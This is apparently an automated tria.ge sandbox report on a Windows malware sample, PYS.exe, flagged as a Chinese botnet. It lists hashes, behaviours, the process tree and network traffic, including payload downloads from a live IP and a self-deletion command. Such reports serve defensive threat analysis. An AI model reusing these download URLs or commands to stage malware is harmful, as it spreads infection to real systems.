Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
18/04/2023, 18:14 UTC
General
-
Target
PYS.exe
-
Size
3.4MB
-
MD5
3651d9ca9d9a43985750f0de73f0c807
-
SHA1
15810e62673e4625b4c8c61ad37f4b48a4760f55
-
SHA256
8e4856e97753bf0e0c73b10d7d7891968e347b73dd2b506e6308d7bca7af0dd0
-
SHA512
23f604c116eea0d4212740594eefe0b044d6e088fad17bbc073c97923e31cb28b53a570a375adf012dbb7f797827595e48bf9a781913f4c08ae0125e0d0a5e05
-
SSDEEP
98304:Ps+xhKoQJBwKhJ+O+uiXAqSuuWHoFN6WtljaEy9oFLOAkGkzdnEVomFHKnP:5oJpQAqSudHmN6WtljaEyqFLOyomFHKP
Score
10/10
Malware Config
Signatures
-
Generic Chinese Botnet
A botnet originating from China which is currently unnamed publicly.
-
Chinese Botnet payload 2 IoCs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\PYS.exe"C:\Users\Admin\AppData\Local\Temp\PYS.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Windowsfig.exe"C:\ProgramData\Windowsfig.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 25803⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C "del /F /S /Q /A C:\ProgramData\Windowsfig.exe"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4668 -ip 46681⤵
Network
-
DNS84.150.43.20.in-addr.arpaRemote address:8.8.8.8:53Request84.150.43.20.in-addr.arpaIN PTRResponse -
DNS123.108.74.40.in-addr.arpaRemote address:8.8.8.8:53Request123.108.74.40.in-addr.arpaIN PTRResponse
-
DNS126.21.238.8.in-addr.arpaRemote address:8.8.8.8:53Request126.21.238.8.in-addr.arpaIN PTRResponse
-
DNS95.221.229.192.in-addr.arpaRemote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
DNS94.19.221.154.in-addr.arpaRemote address:8.8.8.8:53Request94.19.221.154.in-addr.arpaIN PTRResponse
-
DNS232.168.11.51.in-addr.arpaRemote address:8.8.8.8:53Request232.168.11.51.in-addr.arpaIN PTRResponse
-
GEThttp://154.221.25.127/Winconfig.exe?abc=%dRemote address:154.221.25.127:80RequestGET /Winconfig.exe?abc=%d HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 154.221.25.127
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 639488
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.92571969050914; path=/; HttpOnly
ETag: D9C483A3E9F8E95678AB6D58213ED8AC
Last-Modified: Wed, 18 Nov 2020 13:31:26 GMT
Content-Disposition: attachment; filename="Winconfig.exe";
-
GEThttp://154.221.25.127/UnityPlayer.dll?abc=%dRemote address:154.221.25.127:80RequestGET /UnityPlayer.dll?abc=%d HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 154.221.25.127
Connection: Keep-Alive
Cookie: HFS_SID_=0.92571969050914
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 94342
Accept-Ranges: bytes
Server: HFS 2.3m
ETag: D35DB9235033F66A5C97C4ACF51EC560
Last-Modified: Sun, 09 Apr 2023 12:19:46 GMT
Content-Disposition: attachment; filename="UnityPlayer.dll";
-
GEThttp://154.221.25.127/PYS.exe?abc=%dRemote address:154.221.25.127:80RequestGET /PYS.exe?abc=%d HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 154.221.25.127
Connection: Keep-Alive
Cookie: HFS_SID_=0.92571969050914
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 3548672
Accept-Ranges: bytes
Server: HFS 2.3m
ETag: E1848F3EF897629D3D839BA8FC02A540
Last-Modified: Mon, 03 Apr 2023 04:46:12 GMT
Content-Disposition: attachment; filename="PYS.exe";
-
GEThttp://154.221.25.127/Windowsfig.exe?abc=%dRemote address:154.221.25.127:80RequestGET /Windowsfig.exe?abc=%d HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 154.221.25.127
Connection: Keep-Alive
Cookie: HFS_SID_=0.92571969050914
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 110592
Accept-Ranges: bytes
Server: HFS 2.3m
ETag: FC75E801AC5274A114884106E12D88AD
Last-Modified: Thu, 09 Mar 2023 12:17:18 GMT
Content-Disposition: attachment; filename="Windowsfig.exe";
-
DNS127.25.221.154.in-addr.arpaRemote address:8.8.8.8:53Request127.25.221.154.in-addr.arpaIN PTRResponse
-
DNS44.8.109.52.in-addr.arpaRemote address:8.8.8.8:53Request44.8.109.52.in-addr.arpaIN PTRResponse
-
DNS15.164.165.52.in-addr.arpaRemote address:8.8.8.8:53Request15.164.165.52.in-addr.arpaIN PTRResponse
-
DNS2.36.159.162.in-addr.arpaRemote address:8.8.8.8:53Request2.36.159.162.in-addr.arpaIN PTRResponse
-
DNS15.164.165.52.in-addr.arpaRemote address:8.8.8.8:53Request15.164.165.52.in-addr.arpaIN PTRResponse
-
DNS103.169.127.40.in-addr.arpaRemote address:8.8.8.8:53Request103.169.127.40.in-addr.arpaIN PTRResponse
-
154.221.19.94:5010
-
154.221.25.127:80http://154.221.25.127/Windowsfig.exe?abc=%dhttp
HTTP Request
GET http://154.221.25.127/Winconfig.exe?abc=%dHTTP Response
200HTTP Request
GET http://154.221.25.127/UnityPlayer.dll?abc=%dHTTP Response
200HTTP Request
GET http://154.221.25.127/PYS.exe?abc=%dHTTP Response
200HTTP Request
GET http://154.221.25.127/Windowsfig.exe?abc=%dHTTP Response
200 -
40.77.2.164:443
-
173.223.113.164:443 -
173.223.113.131:80
-
131.253.33.203:80
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
8.238.20.126:80
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
107.148.54.103:8848
-
8.8.8.8:5384.150.43.20.in-addr.arpadns
DNS Request
84.150.43.20.in-addr.arpa
-
8.8.8.8:53123.108.74.40.in-addr.arpadns
DNS Request
123.108.74.40.in-addr.arpa
-
8.8.8.8:53126.21.238.8.in-addr.arpadns
DNS Request
126.21.238.8.in-addr.arpa
-
8.8.8.8:5395.221.229.192.in-addr.arpadns
DNS Request
95.221.229.192.in-addr.arpa
-
8.8.8.8:5394.19.221.154.in-addr.arpadns
DNS Request
94.19.221.154.in-addr.arpa
-
8.8.8.8:53232.168.11.51.in-addr.arpadns
DNS Request
232.168.11.51.in-addr.arpa
-
8.8.8.8:53127.25.221.154.in-addr.arpadns
DNS Request
127.25.221.154.in-addr.arpa
-
8.8.8.8:5344.8.109.52.in-addr.arpadns
DNS Request
44.8.109.52.in-addr.arpa
-
8.8.8.8:5315.164.165.52.in-addr.arpadns
DNS Request
15.164.165.52.in-addr.arpa
-
8.8.8.8:532.36.159.162.in-addr.arpadns
DNS Request
2.36.159.162.in-addr.arpa
-
8.8.8.8:5315.164.165.52.in-addr.arpadns
DNS Request
15.164.165.52.in-addr.arpa
-
8.8.8.8:53103.169.127.40.in-addr.arpadns
DNS Request
103.169.127.40.in-addr.arpa
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
108KB
MD540528a8ce542af784cb9958552f7798d
SHA158c5ba782f367a1d65bf712ada150fe0b5e14292
SHA25646780be1f3276ff325e105b85d5cac13b1eae75b04d17340bca01c7d63027cfc
SHA512dad82f72882e2a7ca2fe4cea7360150bdffe394dca582f7afdc378ff6e77578e3dd12da668bf2297532b3d2475d97838571cca6343c4a7515d26449acf287e0a
-
Filesize
108KB
MD540528a8ce542af784cb9958552f7798d
SHA158c5ba782f367a1d65bf712ada150fe0b5e14292
SHA25646780be1f3276ff325e105b85d5cac13b1eae75b04d17340bca01c7d63027cfc
SHA512dad82f72882e2a7ca2fe4cea7360150bdffe394dca582f7afdc378ff6e77578e3dd12da668bf2297532b3d2475d97838571cca6343c4a7515d26449acf287e0a
-
Filesize
108KB
MD540528a8ce542af784cb9958552f7798d
SHA158c5ba782f367a1d65bf712ada150fe0b5e14292
SHA25646780be1f3276ff325e105b85d5cac13b1eae75b04d17340bca01c7d63027cfc
SHA512dad82f72882e2a7ca2fe4cea7360150bdffe394dca582f7afdc378ff6e77578e3dd12da668bf2297532b3d2475d97838571cca6343c4a7515d26449acf287e0a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
156KB
-
Filesize
152KB
-
Filesize
216KB
-
Filesize
5.6MB
-
Filesize
6.2MB
-
Filesize
104KB
-
Filesize
128KB
-
Filesize
6.5MB
-
Filesize
600KB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
64KB
-
Filesize
120KB
-
Filesize
296KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
120KB
-
Filesize
64KB
-
Filesize
40KB